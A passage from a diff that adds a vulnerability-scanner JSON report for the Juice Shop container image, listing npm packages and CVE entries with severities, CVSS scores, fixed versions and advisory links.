"yaml-schema-validator", + "Identifier": { + "PURL": "pkg:npm/yaml-schema-validator@1.2.3", + "UID": "327b37091e1b6169" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/yaml-schema-validator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yargs@15.4.1", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@15.4.1", + "UID": "b4b09ab568377d5b" + }, + "Version": "15.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/yargs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yargs-parser@18.1.3", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@18.1.3", + "UID": "91490c766ea25c2" + }, + "Version": "18.1.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/yargs-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yauzl@2.10.0", + "Name": "yauzl", + "Identifier": { + "PURL": "pkg:npm/yauzl@2.10.0", + "UID": "4bfe67708305159c" + }, + "Version": "2.10.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/yauzl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "z85@0.0.2", + "Name": "z85", + "Identifier": { + "PURL": "pkg:npm/z85@0.0.2", + "UID": "296dac8221473363" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/z85/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "zip-stream@1.2.0", + "Name": "zip-stream", + "Identifier": { + "PURL": "pkg:npm/zip-stream@1.2.0", + "UID": "28a6776eed318d5c" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/zip-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "zod@3.25.76", + "Name": "zod", + "Identifier": { + "PURL": "pkg:npm/zod@3.25.76", + "UID": "62b9a70e177ed081" + }, + "Version": "3.25.76", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/zod/package.json", + "AnalyzedBy": "node-pkg" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2026-3449", + "VendorIDs": [ + "GHSA-vpq2-c234-7xj6" + ], + "PkgID": "@tootallnate/once@1.1.2", + "PkgName": "@tootallnate/once", + "PkgPath": "juice-shop/node_modules/@tootallnate/once/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "bb8d8d749eb76d82" + }, + "InstalledVersion": "1.1.2", + "FixedVersion": "3.0.1, 2.0.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d4ad2cddf7178cdd91ac8c304d2e9a0d8c152de7a79b00bf1335641ff3c69d67", + "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-705" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", + "V3Score": 3.3, + "V40Score": 1.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3449", + "https://github.com/TooTallNate/once", + "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", + "https://github.com/TooTallNate/once/issues/8", + "https://github.com/TooTallNate/once/releases/tag/v2.0.1", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", + "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", + "https://www.cve.org/CVERecord?id=CVE-2026-3449" + ], + "PublishedDate": "2026-03-03T05:17:25.017Z", + "LastModifiedDate": "2026-05-19T15:38:48.397Z" + }, + { + "VulnerabilityID": "NSWG-ECO-428", + "PkgID": "base64url@0.0.6", + "PkgName": "base64url", + "PkgPath": "juice-shop/node_modules/base64url/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/base64url@0.0.6", + "UID": "cc1ef9638242bfa1" + }, + "InstalledVersion": "0.0.6", + "FixedVersion": "\u003e=3.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://hackerone.com/reports/321687", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:7c05e5079374e16bdad78fe92487fcccf41b6d8b7dd6e368e2424779f2560f01", + "Title": "Out-of-bounds Read", + "Description": "`base64url` allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below", + "Severity": "HIGH", + "VendorSeverity": { + "nodejs-security-wg": 3 + }, + "References": [ + "https://github.com/brianloveswords/base64url/pull/25", + "https://hackerone.com/reports/321687" + ] + }, + { + "VulnerabilityID": "GHSA-rvg8-pwq2-xj7q", + "PkgID": "base64url@0.0.6", + "PkgName": "base64url", + "PkgPath": "juice-shop/node_modules/base64url/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/base64url@0.0.6", + "UID": "cc1ef9638242bfa1" + }, + "InstalledVersion": "0.0.6", + "FixedVersion": "3.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-rvg8-pwq2-xj7q", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f77eb2ecaeaf598ba8f4cbbc80e48f7eb6ff3b2cb02ad1e754deb961f6ea654b", + "Title": "Out-of-bounds Read in base64url", + "Description": "Versions of `base64url` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "References": [ + "https://github.com/brianloveswords/base64url", + "https://github.com/brianloveswords/base64url/commit/4fbd954a0a69e9d898de2146557cc6e893e79542", + "https://github.com/brianloveswords/base64url/pull/25", + "https://hackerone.com/reports/321687" + ], + "PublishedDate": "2020-09-01T20:42:44Z", + "LastModifiedDate": "2021-09-24T20:34:56Z" + }, + { + "VulnerabilityID": "CVE-2024-47764", + "VendorIDs": [ + "GHSA-pxg6-pf52-xh8x" + ], + "PkgID": "cookie@0.4.2", + "PkgName": "cookie", + "PkgPath": "juice-shop/node_modules/engine.io/node_modules/cookie/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/cookie@0.4.2", + "UID": "f53e13c80d501e26" + }, + "InstalledVersion": "0.4.2", + "FixedVersion": "0.7.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47764", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:33906b978c66d955d3d905b5eb921710367f78090a3968a7e183823dcebeb286", + "Title": "cookie: cookie accepts cookie name, path, and domain with out of bounds characters", + "Description": "cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.", + "Severity": "LOW", + "CweIDs": [ + "CWE-74" + ], + "VendorSeverity": { + "cbl-mariner": 2, + "ghsa": 1, + "redhat": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-47764", + "https://github.com/jshttp/cookie", + "https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c", + "https://github.com/jshttp/cookie/pull/167", + "https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x", + "https://nvd.nist.gov/vuln/detail/CVE-2024-47764", + "https://www.cve.org/CVERecord?id=CVE-2024-47764" + ], + "PublishedDate": "2024-10-04T20:15:07.31Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2023-46233", + "VendorIDs": [ + "GHSA-xwcq-pm8m-c4vf" + ], + "PkgID": "crypto-js@3.3.0", + "PkgName": "crypto-js", + "PkgPath": "juice-shop/node_modules/crypto-js/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/crypto-js@3.3.0", + "UID": "db05eff811a3ecbf" + }, + "InstalledVersion": "3.3.0", + "FixedVersion": "4.2.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2023-46233", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2647045622ce29db666c82dc731507e7cdbefbd848291941718ed50b42dd8860", + "Title": "crypto-js: PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard", + "Description": "crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-328", + "CWE-916", + "CWE-327" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4, + "redhat": 3, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2023-46233", + "https://github.com/brix/crypto-js", + "https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a", + "https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf", + "https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-46233", + "https://ubuntu.com/security/notices/USN-6753-1", + "https://www.cve.org/CVERecord?id=CVE-2023-46233" + ], + "PublishedDate": "2023-10-25T21:15:10.307Z", + "LastModifiedDate": "2024-11-21T08:28:07.867Z" + }, + { + "VulnerabilityID": "CVE-2022-41940", + "VendorIDs": [ + "GHSA-r7qp-cfhv-p84w" + ], + "PkgID": "engine.io@4.1.2", + "PkgName": "engine.io", + "PkgPath": "juice-shop/node_modules/engine.io/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/engine.io@4.1.2", + "UID": "e41317b2cfdf8e27" + }, + "InstalledVersion": "4.1.2", + "FixedVersion": "3.6.1, 6.2.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-41940", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2e551ae1e0d1981e18bed7ad792a4653bb769d3feb0b3fc8246fc892cf20619b", + "Title": "engine.io: Specially crafted HTTP request can trigger an uncaught exception", + "Description": "Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the engine.io package, including those who uses depending packages like socket.io. There is no known workaround except upgrading to a safe version. There are patches for this issue released in versions 3.6.1 and 6.2.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-41940", + "https://github.com/socketio/engine.io", + "https://github.com/socketio/engine.io/commit/425e833ab13373edf1dd5a0706f07100db14e3c6", + "https://github.com/socketio/engine.io/commit/83c4071af871fc188298d7d591e95670bf9f9085", + "https://github.com/socketio/engine.io/security/advisories/GHSA-r7qp-cfhv-p84w", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41940", + "https://www.cve.org/CVERecord?id=CVE-2022-41940" + ], + "PublishedDate": "2022-11-22T01:15:37.847Z", + "LastModifiedDate": "2024-11-21T07:24:06.98Z" + }, + { + "VulnerabilityID": "CVE-2020-15084", + "VendorIDs": [ + "GHSA-6g6m-m6h5-w9gf" + ], + "PkgID": "express-jwt@0.1.3", + "PkgName": "express-jwt", + "PkgPath": "juice-shop/node_modules/express-jwt/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/express-jwt@0.1.3", + "UID": "6c1d77484eafca2e" + }, + "InstalledVersion": "0.1.3", + "FixedVersion": "6.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-15084", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b77d37e4f27729a3082d1dcfe15a5928a84aae822928e96b25cefbbecaf19fa3", + "Title": "Authorization bypass in express-jwt", + "Description": "In express-jwt (NPM package) up and including version 5.3.3, the algorithms entry to be specified in the configuration is not being enforced. When algorithms is not specified in the configuration, with the combination of jwks-rsa, it may lead to authorization bypass. You are affected by this vulnerability if all of the following conditions apply: - You are using express-jwt - You do not have **algorithms** configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the **secret**. You can fix this by specifying **algorithms** in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-285", + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 4 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", + "V3Score": 7.7 + }, + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V2Score": 4.3, + "V3Score": 9.1 + } + }, + "References": [ + "https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef", + "https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf", + "https://nvd.nist.gov/vuln/detail/CVE-2020-15084" + ], + "PublishedDate": "2020-06-30T16:15:15.22Z", + "LastModifiedDate": "2024-11-21T05:04:46.753Z" + }, + { + "VulnerabilityID": "CVE-2026-31808", + "VendorIDs": [ + "GHSA-5v7r-6r5c-r473" + ], + "PkgID": "file-type@16.5.4", + "PkgName": "file-type", + "PkgPath": "juice-shop/node_modules/file-type/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/file-type@16.5.4", + "UID": "afda4ee71d7d584a" + }, + "InstalledVersion": "16.5.4", + "FixedVersion": "21.3.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31808", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ae42b7ba3e5c55bd77e00b8a74e7972c1f7b30969944dbeb76a639629c81ad46", + "Title": "file-type: file-type: Denial of Service due to infinite loop in ASF file parsing", + "Description": "file-type detects the file type of a file, stream, or data. Prior to 21.3.1, a denial of service vulnerability exists in the ASF (WMV/WMA) file type detection parser. When parsing a crafted input where an ASF sub-header has a size field of zero, the parser enters an infinite loop. The payload value becomes negative (-24), causing tokenizer.ignore(payload) to move the read position backwards, so the same sub-header is read repeatedly forever. Any application that uses file-type to detect the type of untrusted/attacker-controlled input is affected. An attacker can stall the Node.js event loop with a 55-byte payload. Fixed in version 21.3.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-835" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31808", + "https://github.com/sindresorhus/file-type", + "https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f", + "https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31808", + "https://www.cve.org/CVERecord?id=CVE-2026-31808" + ], + "PublishedDate": "2026-03-10T21:16:50.173Z", + "LastModifiedDate": "2026-03-18T19:48:13.733Z" + }, + { + "VulnerabilityID": "CVE-2022-33987", + "VendorIDs": [ + "GHSA-pfrx-2q88-qq97" + ], + "PkgID": "got@8.3.2", + "PkgName": "got", + "PkgPath": "juice-shop/node_modules/got/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/got@8.3.2", + "UID": "ffeef9b389fac3" + }, + "InstalledVersion": "8.3.2", + "FixedVersion": "12.1.0, 11.8.5", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-33987", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bb654d4238cdf7c68deaacac89eaa99e6d2d55626c4d22a5006e228746ef567f", + "Title": "nodejs-got: missing verification of requested URLs allows redirects to UNIX sockets", + "Description": "The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.", + "Severity": "MEDIUM", + "VendorSeverity": { + "alma": 2, + "ghsa": 2, + "nvd": 2, + "oracle-oval": 2, + "redhat": 2, + "rocky": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V2Score": 5, + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2022:6448", + "https://access.redhat.com/security/cve/CVE-2022-33987", + "https://bugzilla.redhat.com/2102001", + "https://bugzilla.redhat.com/2105422", + "https://bugzilla.redhat.com/2105426", + "https://bugzilla.redhat.com/2105428", + "https://bugzilla.redhat.com/2105430", + "https://bugzilla.redhat.com/show_bug.cgi?id=1907444", + "https://bugzilla.redhat.com/show_bug.cgi?id=1945459", + "https://bugzilla.redhat.com/show_bug.cgi?id=1964461", + "https://bugzilla.redhat.com/show_bug.cgi?id=2007557", + "https://bugzilla.redhat.com/show_bug.cgi?id=2098556", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102001", + "https://bugzilla.redhat.com/show_bug.cgi?id=2105422", + "https://bugzilla.redhat.com/show_bug.cgi?id=2105426", + "https://bugzilla.redhat.com/show_bug.cgi?id=2105428", + "https://bugzilla.redhat.com/show_bug.cgi?id=2105430", + "https://bugzilla.redhat.com/show_bug.cgi?id=2121019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124299", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33502", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3807", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29244", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32212", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32213", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32214", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33987", + "https://errata.almalinux.org/8/ALSA-2022-6448.html", + "https://errata.rockylinux.org/RLSA-2022:6595", + "https://github.com/sindresorhus/got", + "https://github.com/sindresorhus/got/commit/861ccd9ac2237df762a9e2beed7edd88c60782dc", + "https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0", + "https://github.com/sindresorhus/got/pull/2047", + "https://github.com/sindresorhus/got/releases/tag/v11.8.5", + "https://github.com/sindresorhus/got/releases/tag/v12.1.0", + "https://linux.oracle.com/cve/CVE-2022-33987.html", + "https://linux.oracle.com/errata/ELSA-2022-6595.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-33987", + "https://www.cve.org/CVERecord?id=CVE-2022-33987" + ], + "PublishedDate": "2022-06-18T21:15:07.933Z", + "LastModifiedDate": "2024-11-21T07:08:43.62Z" + }, + { + "VulnerabilityID": "CVE-2022-25881", + "VendorIDs": [ + "GHSA-rc47-6667-2j5j" + ], + "PkgID": "http-cache-semantics@3.8.1", + "PkgName": "http-cache-semantics", + "PkgPath": "juice-shop/node_modules/http-cache-semantics/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/http-cache-semantics@3.8.1", + "UID": "ddc54df1f009db5f" + }, + "InstalledVersion": "3.8.1", + "FixedVersion": "4.1.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-25881", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f5ab8555067266618db58da6556f3c2d14895785378241d2f8ac4ce1f4069e20", + "Title": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", + "Description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "cbl-mariner": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 2, + "redhat": 2, + "rocky": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2023:1743", + "https://access.redhat.com/security/cve/CVE-2022-25881", + 